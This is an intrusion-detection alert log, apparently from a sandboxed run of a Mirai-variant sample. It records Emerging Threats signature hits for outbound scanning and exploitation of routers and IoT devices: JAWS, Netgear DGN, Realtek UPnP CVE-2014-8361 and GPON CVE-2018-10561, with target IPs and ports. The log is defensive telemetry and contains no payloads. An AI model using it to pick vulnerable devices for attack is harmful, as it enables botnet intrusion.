                                                              2024-12-11T00:43:18.304699+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356244125.138.41.16480TCP
                                                              2024-12-11T00:43:18.304699+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356244125.138.41.16480TCP
                                                              2024-12-11T00:43:18.305072+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358762110.215.176.19680TCP
                                                              2024-12-11T00:43:18.306159+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2333420209.95.98.552869TCP
                                                              2024-12-11T00:43:18.306529+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23454301.146.114.3452869TCP
                                                              2024-12-11T00:43:18.306899+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347912107.123.240.552869TCP
                                                              2024-12-11T00:43:18.307277+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235453648.84.204.2367574TCP
                                                              2024-12-11T00:43:18.308018+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346760103.136.18.24180TCP
                                                              2024-12-11T00:43:18.308383+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356222154.183.15.24080TCP
                                                              2024-12-11T00:43:18.308383+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356222154.183.15.24080TCP
                                                              2024-12-11T00:43:18.308762+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340464174.191.244.58080TCP
                                                              2024-12-11T00:43:18.309123+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235318638.61.43.5980TCP
                                                              2024-12-11T00:43:18.309123+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235318638.61.43.5980TCP
                                                              2024-12-11T00:43:18.309484+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234049048.76.49.7380TCP
                                                              2024-12-11T00:43:18.309860+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2359620104.228.111.1452869TCP
                                                              2024-12-11T00:43:18.310225+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2350832113.213.180.15352869TCP
                                                              2024-12-11T00:43:18.310947+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233539051.78.208.97574TCP
                                                              2024-12-11T00:43:18.311331+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360738171.18.70.1945555TCP
                                                              2024-12-11T00:43:18.312056+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360010198.111.45.20380TCP
                                                              2024-12-11T00:43:18.312419+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235561475.28.78.16780TCP
                                                              2024-12-11T00:43:18.312796+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338914179.129.124.128080TCP
                                                              2024-12-11T00:43:18.313526+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353960117.138.201.2338080TCP
                                                              2024-12-11T00:43:18.313907+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234925421.58.30.2387574TCP
                                                              2024-12-11T00:43:18.314288+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346104167.95.195.488080TCP
                                                              2024-12-11T00:43:18.314636+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334116174.193.104.21780TCP
                                                              2024-12-11T00:43:18.315009+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351516123.85.144.24749152TCP
                                                              2024-12-11T00:43:18.315379+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356064131.11.250.528080TCP
                                                              2024-12-11T00:43:18.316121+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234378045.7.188.2355555TCP
                                                              2024-12-11T00:43:18.316441+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332868217.149.6.5980TCP
                                                              2024-12-11T00:43:18.316441+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332868217.149.6.5980TCP
                                                              2024-12-11T00:43:18.316791+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233581019.207.169.638080TCP
                                                              2024-12-11T00:43:18.317207+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346800116.50.214.17049152TCP
                                                              2024-12-11T00:43:18.317895+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353700129.114.47.18780TCP
                                                              2024-12-11T00:43:18.318266+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352874115.176.251.1337574TCP
                                                              2024-12-11T00:43:18.319381+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235499234.251.227.11780TCP
                                                              2024-12-11T00:43:18.319738+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235576627.155.160.778080TCP
                                                              2024-12-11T00:43:18.320269+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235974056.225.44.2208080TCP
                                                              2024-12-11T00:43:18.320489+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234212092.244.233.2068080TCP
                                                              2024-12-11T00:43:18.320490+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353116105.183.55.2128080TCP
                                                              2024-12-11T00:43:18.321234+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343712220.37.202.849152TCP
                                                              2024-12-11T00:43:18.321398+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236070296.114.30.20780TCP
                                                              2024-12-11T00:43:18.321600+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233995476.56.4.878080TCP
                                                              2024-12-11T00:43:18.322338+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23546146.130.70.8849152TCP
                                                              2024-12-11T00:43:18.323073+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235286029.92.227.3080TCP
                                                              2024-12-11T00:43:18.323073+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235286029.92.227.3080TCP
                                                              2024-12-11T00:43:18.324181+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353702120.95.235.7180TCP
                                                              2024-12-11T00:43:18.325292+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350222189.118.208.525555TCP
                                                              2024-12-11T00:43:18.326403+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346048206.101.86.388080TCP
                                                              2024-12-11T00:43:18.326759+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336152175.33.232.25180TCP
                                                              2024-12-11T00:43:18.326759+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336152175.33.232.25180TCP
                                                              2024-12-11T00:43:18.327502+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343694155.188.212.1168080TCP
                                                              2024-12-11T00:43:18.328243+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234662688.168.89.21380TCP
                                                              2024-12-11T00:43:18.328607+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360616204.174.148.4880TCP
                                                              2024-12-11T00:43:18.328981+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334660175.193.203.4880TCP
                                                              2024-12-11T00:43:18.329351+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335982153.158.173.16949152TCP
                                                              2024-12-11T00:43:18.329721+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234487847.227.87.18949152TCP
                                                              2024-12-11T00:43:18.330097+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233749850.241.123.1280TCP
                                                              2024-12-11T00:43:18.330463+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235718890.16.121.1478080TCP
                                                              2024-12-11T00:43:18.330832+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334398222.180.230.18649152TCP
                                                              2024-12-11T00:43:18.331202+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343264217.185.174.895555TCP
                                                              2024-12-11T00:43:18.331587+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359644131.224.165.20180TCP
                                                              2024-12-11T00:43:18.331587+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359644131.224.165.20180TCP
                                                              2024-12-11T00:43:18.331970+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357702207.208.138.2580TCP
                                                              2024-12-11T00:43:18.331970+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357702207.208.138.2580TCP
                                                              2024-12-11T00:43:18.332323+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235301647.219.98.22052869TCP
                                                              2024-12-11T00:43:18.332681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234490238.94.214.1048080TCP
                                                              2024-12-11T00:43:18.333051+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234847272.196.245.405555TCP
                                                              2024-12-11T00:43:18.333808+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234707030.145.58.1552869TCP
                                                              2024-12-11T00:43:18.334154+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359530129.247.169.17780TCP
                                                              2024-12-11T00:43:18.334525+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2346460131.244.225.10252869TCP
                                                              2024-12-11T00:43:18.334896+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347966189.212.174.22280TCP
                                                              2024-12-11T00:43:18.335280+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343570104.181.12.167574TCP
                                                              2024-12-11T00:43:18.335665+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233528675.198.60.3680TCP
                                                              2024-12-11T00:43:18.335791+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333314153.28.27.688080TCP
                                                              2024-12-11T00:43:18.336012+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236004493.98.197.17980TCP
                                                              2024-12-11T00:43:18.336394+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234161243.51.149.14280TCP
                                                              2024-12-11T00:43:18.336394+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234161243.51.149.14280TCP
                                                              2024-12-11T00:43:18.337158+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358478170.154.175.2268080TCP
                                                              2024-12-11T00:43:18.337927+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2358704134.145.254.1758080TCP
                                                              2024-12-11T00:43:18.338628+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349966138.136.138.16580TCP
                                                              2024-12-11T00:43:18.338744+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234525045.22.47.1038080TCP
                                                              2024-12-11T00:43:18.339399+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233733264.90.223.11680TCP
                                                              2024-12-11T00:43:18.339665+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234246682.213.155.868080TCP
                                                              2024-12-11T00:43:18.339758+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357576141.74.31.8680TCP
                                                              2024-12-11T00:43:18.340515+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235462265.241.114.1049152TCP
                                                              2024-12-11T00:43:18.340889+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234380048.37.127.24280TCP
                                                              2024-12-11T00:43:18.340889+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234380048.37.127.24280TCP
                                                              2024-12-11T00:43:18.341633+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235449884.44.230.19380TCP
                                                              2024-12-11T00:43:18.341633+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235449884.44.230.19380TCP
                                                              2024-12-11T00:43:18.342413+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338126113.43.66.28080TCP
                                                              2024-12-11T00:43:18.343167+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234859011.199.251.11249152TCP
                                                              2024-12-11T00:43:18.343273+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353022117.238.33.988080TCP
                                                              2024-12-11T00:43:18.343657+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234736293.52.53.08080TCP
                                                              2024-12-11T00:43:18.343760+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234401847.80.200.9580TCP
                                                              2024-12-11T00:43:18.343923+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23524108.202.67.2298080TCP
                                                              2024-12-11T00:43:18.344010+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234121496.205.70.20280TCP
                                                              2024-12-11T00:43:18.347560+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234888293.215.216.10680TCP
                                                              2024-12-11T00:43:18.347967+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236022084.227.113.19380TCP
                                                              2024-12-11T00:43:18.349027+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233397889.81.235.16180TCP
                                                              2024-12-11T00:43:18.349400+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2359994165.209.139.4052869TCP
                                                              2024-12-11T00:43:18.349769+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233714893.127.201.1668080TCP
                                                              2024-12-11T00:43:18.350149+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352688137.242.182.1948080TCP
                                                              2024-12-11T00:43:18.350532+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234072888.238.152.1258080TCP
                                                              2024-12-11T00:43:18.350884+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2358554160.49.80.17952869TCP
                                                              2024-12-11T00:43:18.351610+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340484218.127.6.16380TCP
                                                              2024-12-11T00:43:18.353836+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342762115.67.171.1128080TCP
                                                              2024-12-11T00:43:18.354589+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235315280.171.126.2949152TCP
                                                              2024-12-11T00:43:18.354976+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233867219.99.0.7552869TCP
                                                              2024-12-11T00:43:18.355329+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23439065.176.45.17349152TCP
                                                              2024-12-11T00:43:18.355702+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234716269.214.87.24180TCP
                                                              2024-12-11T00:43:18.356443+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333468168.11.66.4980TCP
                                                              2024-12-11T00:43:18.356443+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333468168.11.66.4980TCP
                                                              2024-12-11T00:43:18.357542+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233847094.38.108.17480TCP
                                                              2024-12-11T00:43:18.358271+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338804136.184.13.21680TCP
                                                              2024-12-11T00:43:18.358655+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235206879.28.180.5952869TCP
                                                              2024-12-11T00:43:18.359426+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355826136.244.168.1615555TCP
                                                              2024-12-11T00:43:18.360182+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348968152.230.216.2080TCP
                                                              2024-12-11T00:43:18.360539+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345944156.233.225.1578080TCP
                                                              2024-12-11T00:43:18.360915+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360546191.152.135.2018080TCP
                                                              2024-12-11T00:43:18.361287+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358080221.50.187.17849152TCP
                                                              2024-12-11T00:43:18.361669+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234305297.218.108.1925555TCP
                                                              2024-12-11T00:43:18.362409+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352260141.228.135.1427574TCP
                                                              2024-12-11T00:43:18.363166+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360212102.183.168.1905555TCP
                                                              2024-12-11T00:43:18.364282+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359710176.129.63.1748080TCP
                                                              2024-12-11T00:43:18.364642+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342104195.103.106.24680TCP
                                                              2024-12-11T00:43:18.364642+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342104195.103.106.24680TCP
                                                              2024-12-11T00:43:18.365008+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347872157.65.160.2377574TCP
                                                              2024-12-11T00:43:18.365746+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235262617.113.247.16980TCP
                                                              2024-12-11T00:43:18.365746+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235262617.113.247.16980TCP
                                                              2024-12-11T00:43:18.366505+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334624218.216.106.15349152TCP
                                                              2024-12-11T00:43:18.366881+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235763619.148.27.1628080TCP
                                                              2024-12-11T00:43:18.367631+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359804121.37.63.17580TCP
                                                              2024-12-11T00:43:18.367631+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359804121.37.63.17580TCP
                                                              2024-12-11T00:43:18.367987+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23377584.33.109.1238080TCP
                                                              2024-12-11T00:43:18.368358+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349140182.225.227.23252869TCP
                                                              2024-12-11T00:43:18.368755+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341742139.126.200.2218080TCP
                                                              2024-12-11T00:43:18.369094+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235344461.219.168.2549152TCP
                                                              2024-12-11T00:43:18.369482+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2334124214.179.110.3652869TCP
                                                              2024-12-11T00:43:18.370217+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2333794145.241.115.12752869TCP
                                                              2024-12-11T00:43:18.370584+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337266209.30.237.25180TCP
                                                              2024-12-11T00:43:18.370955+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342268161.243.235.24080TCP
                                                              2024-12-11T00:43:18.370955+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342268161.243.235.24080TCP
                                                              2024-12-11T00:43:18.371343+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23367944.241.28.428080TCP
                                                              2024-12-11T00:43:18.372073+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359308202.99.95.20580TCP
                                                              2024-12-11T00:43:18.372817+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346108211.91.199.1668080TCP
                                                              2024-12-11T00:43:18.373180+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338326168.135.70.17080TCP
                                                              2024-12-11T00:43:18.374288+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235695634.70.187.1288080TCP
                                                              2024-12-11T00:43:18.374658+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234635692.45.169.287574TCP
                                                              2024-12-11T00:43:18.375389+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356034219.203.86.23680TCP
                                                              2024-12-11T00:43:18.375767+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345748175.171.254.3780TCP
                                                              2024-12-11T00:43:18.376173+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235387089.35.238.3952869TCP
                                                              2024-12-11T00:43:18.376494+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233824091.150.21.15152869TCP
                                                              2024-12-11T00:43:18.377252+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340984143.26.169.10380TCP
                                                              2024-12-11T00:43:18.377989+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352762115.50.227.1658080TCP
                                                              2024-12-11T00:43:18.378731+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235295649.74.230.1508080TCP
                                                              2024-12-11T00:43:18.379095+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235342297.4.184.1577574TCP
                                                              2024-12-11T00:43:18.379487+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348098123.107.138.3380TCP
                                                              2024-12-11T00:43:18.383861+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337822177.122.6.738080TCP
                                                              2024-12-11T00:43:18.384228+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355292188.206.66.252869TCP
                                                              2024-12-11T00:43:18.385003+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349482185.7.165.10080TCP
                                                              2024-12-11T00:43:18.385747+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233699627.220.140.15880TCP
                                                              2024-12-11T00:43:18.385747+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233699627.220.140.15880TCP
                                                              2024-12-11T00:43:18.386112+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353412118.186.226.11980TCP
                                                              2024-12-11T00:43:18.386841+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235879851.82.89.20680TCP
                                                              2024-12-11T00:43:18.387203+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235152250.156.95.16080TCP
                                                              2024-12-11T00:43:18.387575+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354212157.99.17.23349152TCP
                                                              2024-12-11T00:43:18.389083+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2334030153.223.215.10752869TCP
                                                              2024-12-11T00:43:18.389448+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358272110.93.67.4780TCP
                                                              2024-12-11T00:43:18.389823+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234035024.139.219.7352869TCP
                                                              2024-12-11T00:43:18.390186+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347940108.101.101.737574TCP
                                                              2024-12-11T00:43:18.390562+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235652831.78.106.1288080TCP
                                                              2024-12-11T00:43:20.369983+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334148126.37.62.2217574TCP
                                                              2024-12-11T00:43:21.320006+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343850106.242.46.1947574TCP
                                                              2024-12-11T00:43:21.329116+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347720187.43.112.1580TCP
                                                              2024-12-11T00:43:21.338964+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356374173.185.234.380TCP
                                                              2024-12-11T00:43:22.483857+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348338112.83.214.9352869TCP
                                                              2024-12-11T00:43:23.579707+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347950138.236.242.13049152TCP
                                                              2024-12-11T00:43:24.079638+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353152188.113.108.3649152TCP
                                                              2024-12-11T00:43:28.340317+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234052821.59.139.6480TCP
                                                              2024-12-11T00:43:28.341430+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235798660.182.201.1147574TCP
                                                              2024-12-11T00:43:28.341804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356624205.208.231.1375555TCP
                                                              2024-12-11T00:43:28.342177+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334596111.78.72.4080TCP
                                                              2024-12-11T00:43:28.342549+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235438653.210.10.23480TCP
                                                              2024-12-11T00:43:28.342944+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335852165.36.4.8849152TCP
                                                              2024-12-11T00:43:28.376866+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235734674.54.233.2378080TCP
                                                              2024-12-11T00:43:28.377244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336760121.246.12.21080TCP
                                                              2024-12-11T00:43:28.377985+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337210169.79.111.2508080TCP
                                                              2024-12-11T00:43:28.379771+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344230217.205.0.1828080TCP
                                                              2024-12-11T00:43:28.461097+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235347671.213.59.19080TCP
                                                              2024-12-11T00:43:28.461344+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236009054.126.187.15780TCP
                                                              2024-12-11T00:43:28.461563+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235048491.32.136.6080TCP
                                                              2024-12-11T00:43:29.284005+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234261646.243.211.1380TCP
